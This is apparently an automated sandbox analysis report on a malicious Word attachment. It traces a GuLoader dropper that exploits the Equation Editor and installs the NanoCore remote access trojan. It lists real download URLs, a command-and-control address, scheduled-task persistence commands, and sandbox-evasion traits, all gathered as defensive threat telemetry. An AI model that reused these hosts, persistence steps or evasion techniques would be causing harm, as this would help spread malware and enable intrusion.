Play interactive tour

Edit tour

Analysis Report PO AAN2102002-V020.doc

Overview

General Information

Sample Name:	PO AAN2102002-V020.doc
Analysis ID:	357103
MD5:	71e541e756ee25fb690431d271d26e47
SHA1:	f7f6c91b2673d889035e3d542aa47c95130d9273
SHA256:	b3104dab0a4fd156fd26e66c494970ba11bc2e954b62d7bb23a618ae7519d1b9
Tags:	doc
Infos:
Most interesting Screenshot:

Detection

Nanocore GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Nanocore Rat

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: NanoCore

Sigma detected: Scheduled temp file as task from temp location

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected GuLoader

Yara detected Nanocore RAT

Connects to a URL shortener service

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Drops PE files to the user root directory

Hides that the sample has been downloaded from the Internet (zone.identifier)

Hides threads from debuggers

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Executables Started in Suspicious Folder

Sigma detected: Execution in Non-Executable Folder

Sigma detected: Suspicious Program Location Process Starts

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Abnormal high CPU Usage

Adds / modifies Windows certificates

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Drops certificate files (DER)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Office Equation Editor has been started

PE file contains strange resources

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Sample execution stops while process was sleeping (likely an evasion)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 252 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

EQNEDT32.EXE (PID: 1204 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

69577.exe (PID: 896 cmdline: C:\Users\Public\69577.exe MD5: ACFCBD916FA04787E4388B339592DD78)

RegAsm.exe (PID: 2428 cmdline: C:\Users\Public\69577.exe MD5: 246BB0F8D68A463FD17C235DEB5491C0)

schtasks.exe (PID: 2988 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp1A35.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

schtasks.exe (PID: 2980 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp678.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

taskeng.exe (PID: 1688 cmdline: taskeng.exe {DA6299CA-95CA-4E9D-8945-2CC05321254C} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)

smtpsvc.exe (PID: 2380 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0 MD5: 246BB0F8D68A463FD17C235DEB5491C0)

filename1.exe (PID: 2152 cmdline: 'C:\Users\user\subfolder1\filename1.exe' MD5: ACFCBD916FA04787E4388B339592DD78)

smtpsvc.exe (PID: 2500 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' MD5: 246BB0F8D68A463FD17C235DEB5491C0)

filename1.exe (PID: 1480 cmdline: 'C:\Users\user\subfolder1\filename1.exe' MD5: ACFCBD916FA04787E4388B339592DD78)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2342821040.0000000000562000.00000040.00000001.sdmp	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
00000005.00000002.2342294404.0000000000080000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
00000005.00000002.2342294404.0000000000080000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
00000005.00000002.2342304047.0000000000090000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
00000005.00000002.2342304047.0000000000090000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
00000005.00000002.2342304047.0000000000090000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 2428	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 2428	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: RegAsm.exe PID: 2428	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x9b74:$a: NanoCore 0x9c15:$a: NanoCore 0x9c82:$a: NanoCore 0x9d43:$a: NanoCore 0xac14:$a: NanoCore 0xac67:$a: NanoCore 0xaca0:$a: NanoCore 0xad13:$a: NanoCore 0xb50cb:$a: NanoCore 0xb50f8:$a: NanoCore 0xb5151:$a: NanoCore 0xbc960:$a: NanoCore 0xbc973:$a: NanoCore 0xbc9a5:$a: NanoCore 0x9c1e:$b: ClientPlugin 0x9c8b:$b: ClientPlugin 0xabac:$b: ClientPlugin 0xabc5:$b: ClientPlugin 0xac70:$b: ClientPlugin 0xaca9:$b: ClientPlugin 0xb518:$b: ClientPlugin
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.RegAsm.exe.80000.0.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
5.2.RegAsm.exe.80000.0.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
5.2.RegAsm.exe.90000.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
5.2.RegAsm.exe.90000.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
5.2.RegAsm.exe.90000.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.RegAsm.exe.94629.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
5.2.RegAsm.exe.94629.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
5.2.RegAsm.exe.94629.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.RegAsm.exe.90000.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
5.2.RegAsm.exe.90000.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
5.2.RegAsm.exe.90000.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Click to see the 6 entries

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1204, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 896

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 67.199.248.10, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1204, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1204, TargetFilename: C:\Users\Public\69577.exe

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ProcessId: 2428, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp1A35.tmp', CommandLine: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp1A35.tmp', CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\Public\69577.exe, ParentImage: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ParentProcessId: 2428, ProcessCommandLine: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp1A35.tmp', ProcessId: 2988

Sigma detected: Executables Started in Suspicious Folder

Show sources

Source: Process started

Sigma detected: Execution in Non-Executable Folder

Show sources

Source: Process started

Sigma detected: Suspicious Program Location Process Starts

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: PO AAN2102002-V020.doc

ReversingLabs: Detection: 27%

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000005.00000002.2342304047.0000000000090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2428, type: MEMORY
Source: Yara match	File source: 5.2.RegAsm.exe.90000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.94629.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.90000.2.unpack, type: UNPACKEDPE

Source: 5.2.RegAsm.exe.90000.2.unpack

Avira: Label: TR/NanoCore.fadte

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\69577.exe

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Binary contains paths to debug symbols

Show sources

Source:	Binary string: RegAsm.pdb source: smtpsvc.exe, smtpsvc.exe.5.dr
Source:	Binary string: mscorrc.pdb source: RegAsm.exe, 00000005.00000002.2342579260.0000000000220000.00000002.00000001.sdmp

Spreading:

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\Microsoft.NET\Framework\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\Microsoft.NET\

Software Vulnerabilities:

Source: global traffic

DNS query: name: bit.ly

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 5.79.72.163:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 67.199.248.10:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49171 -> 194.5.98.182:3765
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49172 -> 194.5.98.182:3765
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 194.5.98.182:3765
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49174 -> 194.5.98.182:3765
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49175 -> 194.5.98.182:3765
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49176 -> 194.5.98.182:3765

Connects to a URL shortener service

Show sources

Source: unknown	DNS query: name: bit.ly
Source: unknown	DNS query: name: bit.ly

Source: global traffic

TCP traffic: 192.168.2.22:49171 -> 194.5.98.182:3765

Source: Joe Sandbox View

IP Address: 67.199.248.10 67.199.248.10

Source: Joe Sandbox View	ASN Name: DANILENKODE DANILENKODE
Source: Joe Sandbox View	ASN Name: GOOGLE-PRIVATE-CLOUDUS GOOGLE-PRIVATE-CLOUDUS

Source: global traffic

HTTP traffic detected: GET /3pNzHgj HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.182

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{784442AB-DE8E-4300-98F0-AE5841A8170E}.tmp

Jump to behavior

Source: global traffic

Source: RegAsm.exe, 00000005.00000002.2351405264.0000000000A4C000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: RegAsm.exe, 00000005.00000002.2351405264.0000000000A4C000.00000004.00000020.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: bit.ly

Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.2.dr	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: 77EC63BDA74BD0D0E0426DC8F8008506.2.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: taskeng.exe, 0000000D.00000002.2342784593.0000000001B60000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: taskeng.exe, 0000000D.00000002.2342784593.0000000001B60000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	String found in binary or memory: https://cbavwq.bl.files.1drv.com/DQ
Source: RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	String found in binary or memory: https://cbavwq.bl.files.1drv.com/O
Source: RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp, RegAsm.exe, 00000005.00000002.2354281853.0000000000A86000.00000004.00000020.sdmp	String found in binary or memory: https://cbavwq.bl.files.1drv.com/y4m3v2kEpIV8FbxWjD8IYOSGc9eY7yGumgM5fcT1ikVolWrnqtFykMCYtt6EVe-wNwa
Source: RegAsm.exe, 00000005.00000002.2351405264.0000000000A4C000.00000004.00000020.sdmp	String found in binary or memory: https://onedrive.live.com/
Source: RegAsm.exe, RegAsm.exe, 00000005.00000002.2342821040.0000000000562000.00000040.00000001.sdmp, RegAsm.exe, 00000005.00000002.2351405264.0000000000A4C000.00000004.00000020.sdmp	String found in binary or memory: https://onedrive.live.com/download?cid=F57CEB019EB26E7D&resid=F57CEB019EB26E7D%21106&authkey=AHaSu1X
Source: RegAsm.exe, 00000005.00000002.2354794151.0000000000A98000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: 3pNzHgj[1].htm.2.dr	String found in binary or memory: https://u.teknik.io/TFppy.txt

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: RegAsm.exe, 00000005.00000002.2342304047.0000000000090000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000005.00000002.2342304047.0000000000090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2428, type: MEMORY
Source: Yara match	File source: 5.2.RegAsm.exe.90000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.94629.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.90000.2.unpack, type: UNPACKEDPE

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

Jump to dropped file

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000005.00000002.2342294404.0000000000080000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2342304047.0000000000090000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegAsm.exe PID: 2428, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.RegAsm.exe.80000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.90000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.94629.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.RegAsm.exe.90000.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\TFppy[1].txt			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\69577.exe			Jump to dropped file

Source: C:\Users\Public\69577.exe	Process Stats: CPU usage > 98%
Source: C:\Users\user\subfolder1\filename1.exe	Process Stats: CPU usage > 98%

Source: C:\Users\Public\69577.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\69577.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\subfolder1\filename1.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\subfolder1\filename1.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\subfolder1\filename1.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\subfolder1\filename1.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_0056700D NtProtectVirtualMemory,
